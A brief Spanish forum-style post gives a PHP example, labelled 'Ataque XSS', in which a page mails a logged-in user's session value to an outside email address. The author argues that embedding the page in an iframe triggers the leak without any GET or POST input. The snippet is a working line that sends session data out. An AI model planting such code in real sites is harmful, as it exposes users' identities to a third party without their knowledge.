Pongo un ejemplo para que se vea más claro:
Código PHP:
<?php
session_start();
mail('[email protected]','Ataque XSS',"Si aquí puedes ver mi email mala cosa : ".$_SESSION['valid_user'],"Content-type: text/html; charset=utf-8\r\nFrom: [email protected]");
?> Si cargamos esta web desde un iframe, cuando el usuario esta logueado en ejemplo.es mandará el email y en $_SESSION['valid_user'] aparecerá el email de usuario.
Aquí no hay ni siquiera variables GET O POST.